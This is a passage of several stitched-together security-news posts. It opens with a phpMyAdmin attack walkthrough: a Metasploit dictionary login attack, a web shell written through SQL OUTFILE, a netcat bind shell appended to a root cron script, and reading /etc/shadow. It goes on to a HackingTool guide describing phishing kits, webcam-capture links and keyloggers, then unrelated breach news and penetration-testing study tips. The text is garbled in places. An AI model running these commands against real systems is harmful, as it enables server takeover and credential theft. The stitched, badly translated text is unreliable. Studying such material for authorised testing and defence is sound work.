Exploiting vulnerable installations of phpMyAdmin is a good example of projects participating in Capture the Flag (CTF) events, although this approach also has applications adaptable to many other web applications. This article will be useful for both beginners in the field of pentesting and those with more experience in security testing and attacks on phpMyAdmin.

What is phpMyAdmin?

This is a web application for managing local MySQL databases generally used in open source projects, so some developers do not even take into account the existence of this application on their systems. In addition, developers also use phpMyAdmin in test environments, which eventually leads to unsaw installations on corporate networks on an ongoing basis.

According to pentesting experts, ideally start by searching for systems on which phpMyAdmin is installed.

How to find servers with phpMyAdmin?

Typically, the resources that use this application are located on the Apache server, although it is not limited to this solution. Sometimes phpMyAdmin is installed in the root directory, most often in the /phpMyAdmin folder, accessible via http://server/phpMyAdmin. That said, we’ll look for web servers running phpMyAdmin using our favorite Nmap port scanner:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

Then, in the generated phpMyAdmin_scan.gnmap file, search for servers with open ports using the following command:

grep -i "open" phpMyAdmin_scan.gnmap

As a result, we found several servers running Apache. Now you need to determine where phpMyAdmin is installed: in the root directory or in the /phpMyAdmin folder.

Accessing environments with NAT

In this example, pentesting specialists will assume that all tests are performed from a system in a NAT environment, requiring a connection to the SSH server behind the firewall.

Because the connection to the NAT environment is via SSH, we will forward port 80 through the SSH tunnel to access the web server with IP address 192.168.1.171. In most cases we will not need port forwarding, although pentesting experts consider it relevant to consider this scenario; below is a diagram for this process.

The following are two examples of SSH tunneling to a target web server.

For Linux (SSH client):

ssh pentest@ssh.servers.com -L 2222: 192.168.1.171: 80

For Windows (PuTTY client):

After configuring port forwarding, we can connect to phpMyAdmin by entering the http://127.0.0.1:2222/phpmyadmin in our local browser.

Dictionary Attack

Once the phpMyAdmin server is found, the next step is to verify whether the default account (root user without password) is used. In this case, it is assumed that the standard account is not in use, although this does not have to be a problem.

It is possible to implement the simplest scenario by using a dictionary to verify possible username and password combinations, although it is best to check whether a dictionary attack could block the account in question. There are many excellent dictionaries, but we’ll use the list below:

A list of users:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Password list

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

Other utilities such as Burp Intruder allow you to deploy dictionary attacks against phpMyAdmin and other web applications. On the other hand, pentesting experts use Metasploit, as this utility has a built-in module to deploy dictionary attacks; this tool is included by default in Kali Linux. The following is a basic list of commands.

msfconsole
use auxiliary/scanner/http/phpMyAdmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

Below we can see a screenshot of a successful dictionary attack.

If a valid user account is found after the attack, you can log in and proceed to the next step.

Upload web shells to the server using phpMyAdmin

Once we find the valid account, the next step is to find functionality to run server operating system commands. MySQL recognizes custom functions that might be useful in these cases, however, we will load the web shell into the root directory using the OUTFILE function.

Remember that in most multi-tier environments you will need to write the web shell to the root directory using SQL Injection will not work because the database and web server are in different locations. Also remember that in some cases, the mysql service account may not have write access to the root directory or phpMyAdmin folder.

Click the “SQL” button to open a window to enter queries. Then run the request shown in the figure below to load a web shell written in PHP on the server, which can be used to run commands on the operating system under the Apache service account. Remember that phpMyAdmin may not always be installed in the /var/www/phpMyAdmin directory if you are working in real environments. The following is an example in the context of working with phpMyAdmin.

Now the downloaded web shell is available in http://127.0.0.1:2222/phpMyAdmin/cmd.php and we can try to run commands on the operating system and perform a privilege escalation. The following are the commands to get started:

whoami
ls –al
ls /

After completing all the necessary operations, be sure to remove the web shell. Add authentication so that you do not create security holes.

It’s time to search for available files and folders to write to all users. The presence of such files and folders on the system is not necessarily a bad thing, but if it is possible to run it directly or indirectly on behalf of the superuser, then there are possibilities for escalating privileges, pentesting specialists point out.

The following is a command that runs through a loaded shell to search for files and folders of this type:

find / -maxdepth 3 -type d -perm -777 2> / dev / null

Now we can start examining the files found for exploitation, as well as looking for potentially vulnerable targets.

Script operation rootcron.sh

In our case, one of the directories we can write to is /scripts/. This folder appears to contain a script to run cron jobs as a superuser, although it is a rare possibility.

The same technology can be applied to scripts used with the sudo command. There are many things that can be programmed to perform tasks, however, we will add a line to start the netcat listener as root and then connect this listener from our machine.

ls /scripts
cat /scripts/rootcron.sh
echo "nc -l -p12345 -e /usr/bin/sh& 2>/dev/null" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh

You must wait for the task to begin, after which you can connect to the listener on port 12345 from your system.

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w

While this is a didactic scenario, reality sometimes exceeds expectations. Although these situations are rare, cases have been seen in real-life pentesting. For scenarios that require a reverse shell instead of a binding shell, pentestmonkey.net provides several useful options. You can find multiple examples of the netcat listener installation process online.

Conclusion

In this article IICS experts demonstrate one of the ways to obtain a superuser-rights shell on a remote Linux system using vulnerable phpMyAdmin settings and a script run as root that can be edited. While there are many ways to accomplish the same task, this example demonstrates that web application management dashboards can be fairly accessible goals and are often the starting point for running operating system commands.

The post How to Hack MySQL Databases. Pentesting phpMyAdmin appeared first on Information Security Newspaper | Hacking News.

We always prefer Operating system which has all penetration testing tools bundled in one. HackingTool is one of that kind, its an open-source framework and we use this for penetration testing. This tool has 73 hacking tools of different range. In this framework, we have all the tools in one place, which the penetration tester needs while testing. Researcher of International Institute of Cyber Security also agrees, that it is easier for hackers/penetration tester while testing/hacking any device or a network. During this post we will demonstrate step by step process on the usage of this tool.

Environment

• Os: Kali Linux 2020 64 bit
• Kernel version: 5.6.0

Installation Steps

• Use this command to clone the project.
• git clone https://github.com/Z4nzu/hackingtool

root@kali:/home/iicybersecurity# git clone https://github.com/Z4nzu/hackingtool
Cloning into 'hackingtool'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 174 (delta 9), reused 0 (delta 0), pack-reused 150
Receiving objects: 100% (174/174), 666.21 KiB | 853.00 KiB/s, done.
Resolving deltas: 100% (91/91), done.

• Use this command to provide file permissions and enter into the directory.
• chmod -R 755 hackingtool && cd hackingtool

root@kali:/home/iicybersecurity# chmod -R 755 hackingtool && cd hackingtool
root@kali:/home/iicybersecurity/hackingtool#

• Next, use this command to install the requirements sudo pip3 install -r requirement.txt

root@kali:/home/iicybersecurity/hackingtool# sudo pip3 install -r requirement.txt
Requirement already satisfied: lolcat in /usr/local/lib/python3.8/dist-packages (from -r requirement.txt (line 1)) (1.4)
Requirement already satisfied: boxes in /usr/local/lib/python3.8/dist-packages (from -r requirement.txt (line 2)) (0.0.0)
Requirement already satisfied: flask in /usr/lib/python3/dist-packages (from -r requirement.txt (line 3)) (1.1.2)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirement.txt (line 4)) (2.23.0)

• Now, use this command to launch the tool. python3 hackingtool.py

• Successfully launched the tool.
• Here, we see 15 different modules.
• Detailed below are different modules:

AnonSurf

What is Anonmously surf

Anonymously surf is a place where we can hide by changing our location. Here we are using the Anonsurf tool, this tool sets iptables settings to set transparent proxy via TOR network. This anonsurf tool sends all our outgoing traffic through the TOR network, so by using this we can be safe while browsing the internet.

• Here, choose 00 AnonSurf.

• Now, choose option 1 for Anonmously surf. Before launching this tool, we have to download the tool by choosing option 1.

sh: 2: boxes: not found
sh: 1: echo: echo: I/O error
[1]install [2]Run [3]Stop [99]Main Menu >> 1
Cloning into 'kali-anonsurf'...
remote: Enumerating objects: 321, done.
remote: Total 321 (delta 0), reused 0 (delta 0), pack-reused 321
Receiving objects: 100% (321/321), 167.72 KiB | 377.00 KiB/s, done.
Resolving deltas: 100% (99/99), done.
--2020-07-06 10:36:14--  https://geti2p.net/_static/i2p-debian-repo.key.asc
Resolving geti2p.net (geti2p.net)... 91.143.92.136, 2a02:180:a:65:2456:6542:1101:1010
Connecting to geti2p.net (geti2p.net)|91.143.92.136|:443... connected.
HTTP request sent, awaiting response... 200 OK
=============================================================================================================SNIP==============================================================================================================================
Processing triggers for systemd (245.6-1) ...
Processing triggers for man-db (2.9.3-1) ...
Processing triggers for kali-menu (2020.3.1) ...
dpkg-deb: building package 'kali-anonsurf' in 'kali-anonsurf.deb'.
Selecting previously unselected package kali-anonsurf.
(Reading database ... 525307 files and directories currently installed.)
Preparing to unpack kali-anonsurf.deb ...
Unpacking kali-anonsurf (1.2.2.2) ...
Setting up kali-anonsurf (1.2.2.2) ...
Processing triggers for systemd (245.6-1) ...
Processing triggers for kali-menu (2020.3.1) ...

• Now, choose option 1 to select anonsurf tool and choose option 2 to run the tool.

sh: 2: boxes: not found
sh: 1: echo: echo: I/O error
[1]install [2]Run [3]Stop [99]Main Menu >> 2
 * killing dangerous applications
 * cleaning some dangerous cache elements
[ i ] Stopping IPv6 services:
 
 
[ i ] Starting anonymous mode:
 
 * Modified resolv.conf to use Tor and Private Internet Access DNS
 * All traffic was redirected through Tor
 
[ i ] You are under AnonSurf tunnel

• Here, we have successfully started the tor network.
• Now, type ifconfig.me in browser to verify our IP.

• Successfully we have changed the location.

Information Gathering

What is information gathering?

Information Gathering is collecting some unique information about the target it can be active or passive. 

• Now, choose option 1 to use information gathering.

• Successfully launched the information gathering module.
• Now, choose option 5 to use “Xerosplit” tool.

• Before running the tool, we have to install the tool by selecting option 1 Install.
• It automatically clone the file and we have to choose the operating system, depending on this it will download the requirements.

[++] Installing Xerosploit ...
Hit:1 http://deb.i2p2.no unstable InRelease
Hit:2 http://mirror.neostrada.nl/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
build-essential is already the newest version (12.8).
build-essential set to manually installed.
git is already the newest version (1:2.27.0-1).
=================================================================================================================SNIP========================================================================================================================
Installing ri documentation for network_interface-0.0.2
Parsing documentation for pcaprub-0.13.0
Installing ri documentation for pcaprub-0.13.0
Parsing documentation for packetfu-1.1.13
Installing ri documentation for packetfu-1.1.13
Parsing documentation for xettercap-1.5.7xerob
Installing ri documentation for xettercap-1.5.7xerob
Done installing documentation for em-proxy, net-dns, network_interface, pcaprub, packetfu, xettercap after 7 seconds
6 gems installed

• Now, choose option 5 for the Xerosploit tool, then choose option 2 to run xerosploit tool.

• Now, type help to view the options.

• Here, we have selected “scan” option. This will collect all the IP address and MAC address, which are connected to a LAN (Local Area Network).

Wordlist Generator

The Goblin word creator is used to generate the wordlist. This wordlist is useful for password cracking techniques in brute force attacks etc.

• Now, choose the option 3 to run Goblin wordCreator tool.

sh: 1: boxes: not found
sh: 1: echo: echo: I/O error
[1]Install [2]Run [99]Back >>2
 
------------------
 
 G 0 B L ! N 2.0 | WORDGENERATOR
 
~ by: UndeadSec and Sam Junior:@un00mz
 
------------------
 
[!] provide a size scale [eg: "1 to 8" = 1:8] : 1:3
 
[?] Do you want to enter personal data ? [y/N]: y
 
[*] Fist Name: vemula
 
[*] Last Name: nandu
 
[*] Birthday: 20
 
[*] Month: may
 
[*] Year: 1996
 
[!] Insert a name for your wordlist file: wordlist
 
[?] Do you want to use uppercase characters? (y/n): n
 
[?] Do you want to use special characters? (y/n): n
 
[?] Do you want to use numeric characters? (y/n): y 

•  First, choose option 1 to install the tool and it’s requirements, then choose option 2 to launch the tool.
• Here, it asks to use the scale size for wordlist length. Then it will ask to use a few personal details and select the required option. Then the tool starts generating the wordlist.

v
e
Q
p
l
a
=============================================================================================================SNIP===============================================================================================================================
003
004
005
006
007
008
009
000  

• Successfully we got the list.
• If you want to generate wordlist offline then you can also use crunch tool.

Wireless Attack

What is Wireless Attack

The wireless attack can be of many types. Example like Man In The Middle Attack, DOS attack.

• In this module we have 7 different tools.

• WIFI – Pumpkin: WIFI – Pumpkin help hacker to create open-source fake wifi. If any victim connect to that wifi, we will be able to track his/her activities
• Pixiewps: Pixiewps tool is used brute force the WPS pin in offline. This tool is built-in C language.
• Fluxion: Fluxion is a wifi hacking tool. This tool doesn’t need any wordlist to crack the password. Using this tool we can hack two different ways manually reveal the hidden WIFI access and how to access hidden wifi.
• WIFITE: WIFITE is used to attack the WIFI to steal the credentials for this, this performs a dictionary attack with a high number of wordlist for this we need a wireless adapter.
• EvilTwin: EvilTwin is a hacking tool, using this tool hacker setups a fake WIFI network. If the victim connects to this wifi network, so it will be easy to steal the victim’s login credentials or other sensitive information.

if you want to learn all the tools then you can refer to the ethical hacking course offered by International Institute of Cyber Security.

SQL Injection tools

What is SQLMap

SQLMap is an automatic SQL injection tool. We can use this tool to find out SQLi vulnerabilities on a webpage and stealing the confidential data from the database server. This is an open-source and penetration testing tool.

Phishing Attack Tools

The main aim of Phishing Attack is to steal the victim’s credentials by creating the fake phishing page.  

• Setoolkit: Setoolkit is also called a social engineering tool kit. We can use this social engineering tool to create the fake webpage to the victim to steal the victim’s credentials and we can also create the different payload to bypass the victim’s machine.
• SocialFish: SocialFish is used for a phishing attack. Using this tool, we can create phishing pages to steal the victim’s credentials and collecting those credentials using traffic collector servers.
• Shellfish: ShellFish is used for phishing attacks. Using this tool, we can create 18 popular phishing pages to steal the victim’s credentials and most of the social media phishing pages are available in this tool.
• BlackEye: BlackEye is used for phishing attacks. Using this tool, we can create 32 popular phishing pages to steal the victim’s credentials and most of the social media phishing pages are available in this tool.
• I See You: I See You is used for a phishing attack. Using this tool we can get the victim’s location details.
• Say cheese: Say cheese is used for phishing attacks. This tool creates a malicious link, if the victim opens this link it starts taking the webcam shots and sends back to the hacker’s machine using port forwarding techniques.
• QR code Jacking: QR code jacking is used for phishing attacks. This tool creates a malicious QR code, if the victim scan this malicious QR code with his account, the same hacker will able to access the victim’s account.

Web Hacking

What is Web Hacking

Web hacking is exploiting the websites by collecting information, scanning the websites with different tools, finding out the vulnerabilities, exploiting the website and stealing the visitor’s information, spreading viruses, etc.

• In the web attack module, we have 5 different tools.
  • Web2Attack
  • Skipfish
  • SubDomain Finder
  • CheckURL
  • Blazy (Also Find ClickJacking)

• In the web attack module, we have 5 different tools.

Blazy

Blazy is another brute-force tool and very good error detecting tool, using this tool we can find out the CSRF (Cross-Site Request Forgery), Clickjacking, Cloudflare. This tool has a default username and password.txt file or we can also create our own username and password list file.

• Before launching the tool, we have installed this by choosing option 1. This will install the file and follow the same steps then chose option 2 to launch the tool.

• Here, we have entered the target URL hackthissite.org. This tool scanned and found CSRF Vulnerability in this website.

Post exploitation

What is Post Exploitation?

We use the post-exploitation module after compromising the machine. In this process, the hacker’s aim is to collect the victim’s sensitive data.

• In post exploitation we have 2 different tool
  • Vegile – Ghost in the shell
  • Chrome Key logger

Forensics tools

The computer forensics tools are used to check the operating system after post exploitation in system or network.

• In the forensic module, we have 5 different tools
  • Autopsy
  • Wireshark
  • Bulk_extractor
  • Disk Clone and ISO Image Acquire
  • Toolsley

Payloads

What is Payloads

The payloads is a simple scripts/malicious content file used by hackers to exploit any victims machine by simply executing this payload on the victims machine.

• In this module we have 6 different payloads
  • The FatRat
  • Brutal
  • Stitch
  • MSFVenom Payload Creator
  • Venom Shellcode Generator
  • Spycam

Router Exploit

Router Exploit is an open-source and powerful hacking tool. Using this tool, we can find the vulnerabilities in routers, Cameras, etc

• In this module, we have 2 different tools
  • RouterSploit
  • Fastssh

wifi-jammer

What is wifi-jammer?

WiFi-jammer is a powerful hacking tool, using this tool we can restrict any user while connect connecting to the wifi.

• In this module we have one tool
  • Using Airmon

SocialMedia Finder

What is SocialMedia Finder

Social Media Finder is same like information gathering. In this we investigate different social media profile by using they usernames and they photos.

• In this module we have two different tools.
  • Find SocialMedia By Facial Recognition System
  • Find SocialMedia By UserName

Steganography

Steganography is the best tool for hiding any type of file like Images, confidential information, file, etc.

• In this module, we have 3 different tools.
  • SteganoHide
  • StegnoCracker
  • WhiteSpace

Conclusion

We saw all the penetration testing tool bundled in HackingTool which can be used to perform penetration testing. Most of the tools are widely used in a real-time environment. Using this tool, it makes easier for penetration tester to do his/her job.

The post 73 Hacking Tools in one Hacking Tool – Step By Step appeared first on Information Security Newspaper | Hacking News.

The British Ministry of Defense has just issued an internal statement to inform its staff of the immediate suspension in the use of this platform, at least until an investigation into their safety is completed. The Defense also called for the security of other services and platforms.

The message sent to ministry members mentions that, in the near future, it will be decided whether the British government can continue to use Zoom, or if it will be stopped permanently. In this regard, penetration testing services specialists say this was a predictable measure, as it is vital for governments and private companies around the world to have secure communication channels in the face of contingency.

On the other hand, Paul Bischoff, renowned penetration testing services expert from Comparitech, says Zoom’s popularity has increased markedly over the past few weeks, although companies that use it do not tend to stop to think about the safety of this platform.

Employees of public and private organizations who were previously unfamiliar with this class of services have had to resort to their use in the face of the inability to attend their workplaces; even some people have learned to use Zoom for social purposes, as it offers better quality in service than more common platforms, such as WhatsApp video call.

Although this platform has all possible security measures, they are not exempt from faults. A few months ago, for example, the International Institute of Cyber Security (IICS) revealed a webcam security flaw that could have been exploited to compromise any Zoom sessions. Despite receiving multiple reports, the company took too long to correct the flaw, which generated discontent among its thousands of users.

The post Why government agencies do not feel secure about using Zoom videoconference? appeared first on Information Security Newspaper | Hacking News.

All affected customers, mainly members of MyFriday, the chain rewards program, were notified of the incident this weekend. In addition, the company advised them to reset the password of their program accounts.

Apparently the incident occurred due to a missecurity configuration on one of the company’s servers. A TGI Fridays spokesperson claims that customer payment card information was not compromised during the incident, although it is not specified what personal data remained exposed, experts mention penetration testing experts.

The company notified the Australian Information Commissioner’s Office (OAIC) of the data breach, emphasizing that the incident was caused by a technical error, as well as ruling out the possible intrusion of a threat actor into the chain’s systems restaurants. Just a couple of days ago, OAIC had released up-to-date figures on cybersecurity incidents, reporting that 245 different cases of security breaches and data breaches occurred between April and June this year.

According to the pentesting experts who collaborated with OAIC in this quarterly report, the human factor prone to mistakes is a recurring element in much of this type of incident. However, security incidents intentionally caused by groups of threat actors prevail in these reports, as 6 out of 10 cybersecurity incidents are considered cyberattacks.

The new OAIC policy obliges companies operating with personal data in Australian territory to report any computer security incidents under a new scheme, known as Notifiable Data Breaches (NDB), implemented around a year ago.

Under this new scheme, private companies, government agencies and other organizations must report these incidents within 30 days after detection, especially if the incident is serious enough to compromise their cause major damage. Angelene Falk, Information Commissioner and Australian Data Privacy Office, says this new regime has been best adopted by companies operating in Australia, and “will help authorities and companies improve protocols response to such incidents.”

According to pentesting specialists from the International Institute of Cyber Security (IICS), they say that data breaches arising from human error remain all too common. Recently, millions of users of the Luscious adult website suffered exposure to some personal data due to misconfigurations in the website’s systems. Committed data include personal details such as usernames, email addresses, gender, site activity history, location data, and, in some cases, full user names.

The post Data breach at TGI Fridays; millions of users’ data exposed appeared first on Information Security Newspaper | Hacking News.

Last Thursday, a group of hackers, self-appointed as “Boris Bullet-Dodge”, contacted multiple members of the cybersecurity community to announce the hacking incident; ackers sent a sample of the files extracted from Perceptics’s corporate networks to demonstrate the veracity of their claims. It is believed that this group of threat actors was also involved in a security incident last month.

The exposed information include files with different extensions (.xlsx,.jpg,.docx,.mp4, etc) with location names, zip codes, files related to the company’s government clients and evidence material, report the web application penetration testing specialists.

Exposed files, equivalent to hundreds of GB of information, include Microsoft Exchange databases, human resource records, Microsoft Server data stores, and more. Confidential details of the company, such as financial figures and personal information, are currently available in multiple compressed files format in various hacking forums on dark web.

Given the nature of the business of the company, dedicated to tasks such as the acquisition of border security data, commercial vehicle inspection, electronic payment of highway fees and road monitoring, web application penetration testing specialists believe that a considerable amount of confidential information is likely to have been exposed.

A spokeswoman for Perceptics confirmed that the company was aware of the state of security in its networks. “We are collaborating with federal authorities in investigating the incident; that’s all we can say for now”, concluded the spokesperson.

According to the experts from the International Institute of Cyber Security (IICS), the company’s website redirects visitors to the Google home page, so it is believed that the organization still fails to restore all of its systems. More details are expected in the coming days.

The post Data breach at Perceptics, vehicle plate scanner manufacturer appeared first on Information Security Newspaper | Hacking News.

This massive drop in service was triggered by a script error that affected all of Pardot’s clients, marketing automation software; in addition, a database script inadvertently provided users with broader access to data with levels of high privilege access.

Through social media, mainly Twitter, multiple users showed their displeasure with the incident:  “The outage in Salesforce means that I can’t do my job regularly; half of the tabs are missing”, the user @RBfree850 tweeted.

The first step that Salesforce took in response to this incident was to disable any access to the company’s customers, not just Pardot’s customers, while the incident was corrected, web application penetration testing specialists mentioned.

Subsequently, the company restored access to users who were not affected by the incident, which meant that regular Salesforce users were able to normalize their activities. However, things were different for users of the Pardot software, because in this case only system administrators were able to recover their access.

Administrators must then rebuild the user profiles and grant the corresponding access permissions. Although this might sound like a really tedious process, web application penetration testing experts say it’s possible to deploy existing backups from the software’s sandbox.

According to the experts from the International Institute of Cyber Security (IICS), this is a clear example of a risk of cybersecurity is originated not necessarily by threat actors, but by a poorly implemented information security policy. Companies need to restrict as much as possible the number of people with high access privileges to the critical systems and data of an organization; a more proactive information security policy can be the difference between a safe environment and one that is exposed to higher external risks.

The post Massive outage in Salesforce systems last weekend appeared first on Information Security Newspaper | Hacking News.

The LightNeuron backdoor was specially developed to attack Microsoft Exchange email servers and, according to web application penetration testing experts, it works as a mail transfer agent (MTA), a method never seen before in a backdoor. “Probably this is the first malicious software designed to specifically target Microsoft Exchange”, mentioned one of the specialists.

Experts mention that LightNeuron allows threat actors to get full control over all the activities of the infected server; thus, attackers can intercept, redirect, and even edit incoming and outgoing email on the compromised server.

Cyber spying operations perpetrated by this group, identified as Turla, appear to have emerged from a sci-fi tale. On previous occasions, this group has hijacked satellites to deploy malware hidden in Instagram comments, and have even taken control of the entire infrastructure of Internet service provider companies.

Web application penetration testing specialists mention that Turla has used the backdoor LightNeuron at least for the last five years, a factor that demonstrates the advanced capabilities of this criminal group to bypass police agencies since 2014.

The specialists say that they have already detected three victims of this attack, although the names of the affected organizations were not revealed, the experts mentioned some details:

• One of the victims is a Brazilian organization
• The Ministry of Foreign Affairs of a European country
• A Middle Eastern diplomatic organization

According to the experts of the International Institute of Cyber Security (IICS), LightNeuron’s highlight is its command and control mechanism. Once a Microsoft Exchange server is infected and modified with LightNeuron, hackers will never connect to it directly, but will send emails with PDF or JPG attachments. 

Using the steganography, the hackers hide the commands in the attached images, these commands are subsequently read by the backdoor to finally be executed, this makes it extremely complex to detect an attack attempt by Turla.

The post LightNeuron, the backdoor designed especially for Microsoft Exchange appeared first on Information Security Newspaper | Hacking News.

GyoiThon executes steps 1 and 4 automatically. The only operation of the user is to enter the top URL of the target web server in GyoiThon. You can identify vulnerabilities in web servers without so much time and effort.

Step 1. Collect HTTP responses. GyoiThon gathers several HTTP responses from the target website while reviewing the site.

Step 2. Identify the name of the product. The expert comments that GyoiThon identifies the name of the product installed on the web server using the following two methods.

1. Based on Machine Learning: when using (Naive Bayes) Machine Learning, GyoiThon identifies the software based on a combination of different characteristics; Etag value, Cookie value, specific HTML tag and others. Unlike the signature database, Naive Bayes is identified stochastically based on several features included in the HTTP response when the software can not be identified in a feature.

Ejemplo:   Etag: “409ed-183-53c5f732641c0”

GyoiThon can identify the Apache web server software. This is because GyoiThon learns Apache features, such as “Etag header value (409ed-183-53c5f732641c0).” Apache uses a combination of lowercase letters and numbers as the Etag value and the Etag value is separated by 4-5. 5 digits and 3-4 digits and 12 digits, the final digit is 0 in many cases.

Example 2: Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;

GyoiThon can identify the CMS Joomla !. This is because GyoiThon learns the features of Joomla! as “Cookie name (f00e6 … 9831e)” and “Cookie value (0eba9 … 7f587).

2. Based on string matching: GyoiThon can identify the software by matching strings also used in traditional penetration testing tools.

Example: /core/misc/drupal.js?v=8.3.1

Step 3. Exploit using Metasploit. According to the information security expert, in this step, GyoiThon runs the exploit corresponding to the software identified using Metasploit and checks if the software is affected by the vulnerability.

Step 4. Generate scan report. GyoiThon generates a report that summarizes the vulnerabilities. The style of the report is html.

Operation check environment:

• Kali Linux 2017.3 (for Metasploit)
  • Memory: 8.0GB
  • Metasploit Framework 4.16.15-dev
• ubuntu 16.04 LTS (Host OS)
  • CPU: Intel(R) Core(TM) i5-5200U 2.20GHz
  • Memory: 8.0GB
  • Python 3.6.1（Anaconda3）
  • docopt 0.6.2
  • jinja2 2.10
  • msgpack-python 0.4.8
  • pandas 0.20.3

The post GyoiThon: tool to make penetration testing with Machine Learning appeared first on Information Security Newspaper | Hacking News.

One tip is to take note. Maybe this seems completely foreign, but: to take advantage of their experience in PWK, they should be able to do an effective job of taking notes. You must know how to structure your notes, how to keep the data associated with different machines, and keep screenshots with your notes, etc.

There is not just one way to do it, but you could separate the notes into two categories:

• Thematic notes that describe information about particular vulnerabilities, tools or techniques. As it could be, to associate particular exploits of the kernel with the versions to which they apply, or notes on techniques to pivot through machines.
• Notes per machine. Detailing the information about the operating system and the applications, vulnerabilities and vulnerabilities applicable, and the technique that I used. For most machines, a python or metasploit rc script can also be produced to quickly re-explode the machine, since the equipment in the lab room can be restarted at any time by other students.

In the case of having Linux on the workstation. It is surprising to see people enrolling in a class called “Penetration Testing with Kali Linux”, but never before had I used Linux, however, there are many reports of this. Information security experts recommend that you learn to use some form of Linux before paying hundreds of dollars a month for access to the lab. At least you should be familiar with:

• The design of the file system
• Network settings
• Shell familiarity
• How to use SSH

You do not have to use Kali, but since it’s based on Debian Testing, you can use some kind of Debian derivative. Debian, Ubuntu and Mint are good options.

A good way to start is to download a distribution, place it in a virtual machine and start using it for a while. Then try to do some “daily controller” tasks and familiarize yourself with the interface. Configure and run the SSH server, and test with SSH on.

Experts also recommend OverTheWire Bandit which is a free “war game” that teaches basic Linux concepts. It’s free and it’s a good place to start. If you can overcome that, you will be on your way to the basic knowledge of Linux to continue with PWK.

Experts say you must learn what you do not know. It is important to find the gaps in your knowledge so that you know what to investigate and how to fill those gaps can be quite a challenge. Check the Syllabus for the PWK course. If you find yourself confused, you can research more and spend more time becoming familiar with the concepts and terminology.

The class will teach you a lot about the material, but if you are lost even with what the titles mean, it will be almost impossible to follow and you will definitely not spend so much time working in the laboratories.

IP and Ethernet networks

Almost all modern networks use IP in the network layer (L3). As a result, you must be familiar with the IP network. Mainly relevant is the division into IP subnets and the difference between routing and switched networks. Know what RFC1918 is and why these IP addresses are special. It may be useful to learn how to translate between representations of CIDR subnets, such as / 24 and / 255.255.255.0.

Information security professionals say that you should have an understanding of No route to the host and how to correct or circumvent it. You should also understand how a host with two hosts works and how that differs from a host that acts as a router between two networks. Note the differences between broadcast and single broadcast traffic.

• IP Protocol
• Ethernet
• IP subnet calculator

For TCP and UDP. It is important to know the differences between TCP and UDP. This includes differences in terms of establishment and maintenance of the connection, as well as differences in the reliability of the protocols. Common well-known service port numbers will also be useful to know, say information security researchers.

• TCP
• UDP
• List of TCP and UDP port numbers

Regarding network protocols

Learn about some of the common protocols used in networks. Even if you do not learn details or read the RFCs, at least read the Wikipedia article about some of the most common protocols.

• DNS
• Telnet
• SSH
• HTTP
• SMB / CIFS
• TLS

Now we will talk about operating systems and applications. The professionals comment that knowing how operating systems work at a basic level will be of great help. This includes differences between operating systems, how processes work, how file systems work, and information about authentication and authorization in each operating system.

We will begin with Linux. It is very important to understand the different types of authentication and authorization mechanisms in Linux systems, as well as the interfaces of operating systems and common services.

• The root user
• Setuid Binaries
• POSIX users and groups
• Posix file system permissions
• SELinux and AppArmor
• File locations (/ etc / passwd, / etc / shadow, etc.)
• How services are started (SysV init, Upstart, systemd)

Now Windows. Windows has a very different behavior from Linux and POSIX systems. Most PWK students are probably familiar with Windows on the desktop, but not in a multi-user or Windows domain.

• Users and groups
• File system permissions
• Windows Services
• Domain authentication
• SMB / CIFS resources

We will continue with some applications. Part of this is independent of the operating system or may differ from the operating system, but it is important that it is known. Database servers (MySQL / MSSQL / PostgreSQL) and application servers are a large part of the attack surface. For example, know different web servers (Apache, nginx, IIS) and mechanisms to load web applications (mod_php, cgi scripts, php-fpm, Python WSGI and ASP.net). Not all of these are critical, but being familiar will be useful.

In a business environment, there will be dozens of web applications, most of which are supported by database servers or other application servers.

Regarding security issues. PWK is mainly about learning safety skills, but there must be some knowledge that a student brings to the table, say information security experts. Understanding the basics of security will serve the student during the course.

• The triad of the CIA (Confidentiality, integrity and availability)
• Authentication vs Authorization
• Memory corruption vulnerabilities
• Web vulnerabilities (maybe OWASP Top 10)

Scripting. Researchers say it will be useful to become familiar with reading scripts written in Python or Ruby. Many of the exploits in Exploit-DB are in one of these two languages. In addition, Metasploit is written in Ruby, so being able to refer to this as necessary will be very useful.

It’s even better if you can write in one of these languages ​​or another scripting language. This will help you with the playback scripts and it will be a very useful skill.

Get the most out of PWK. Based on experiences, your learning style and experience may vary.

He took note-taking as one of the best skills, and now as one of the activities that you should focus on during the course. Taking notes will help you keep your learning more effectively and, since the exam is open book, it can help you in the exam. If you choose to send a report for the lab and the exam, you can use this documentation to generate the lab report.

The documentation can take many forms during the course:

• Notes, whether written by hand or typed
• Network diagrams
• Shell logs / command line logs
• Screenshots

If in doubt, bring additional documentation. A couple of minutes here or there could work in the long term. I treated the lab as a “real” penetration test, where I documented each machine committed to:

• Enumeration / Recon information
• Vulnerability and exploit used to compromise
• Hashes / downloaded accounts
• Screenshot of access to the machine
• Privilege escalation information
• Any useful artifact (documentation, files, shared shared files, etc.)

Recognition. The value of the recognition and counting phase cannot be emphasized enough. The exhaustive collection of information will help you identify vulnerabilities and understand how the network fits. The laboratory environment is really a network with interconnected components, and recognizing it as such during the recognition phase will make it much more successful. Information security researchers comment that understanding the relationship between machines will help to pivot between hosts and network segments. Understanding the role of the machine helps you determine how the machine could benefit you.

Now we will talk about time management. There are several aspects in your time management throughout the course. Experts recommend not dividing your time between course material and laboratories.

It is recommended to flip through the lab book to get a general understanding of the progression of the course, then go back and tour the labs, videos and exercises together. If you want to get the most out of your course, information security professionals suggest that you try to complete all the course material in about half the time of the lab, because the course material does not provide all the machines in the lab. The other half of the time can be used to work independently on the machines in the laboratory.

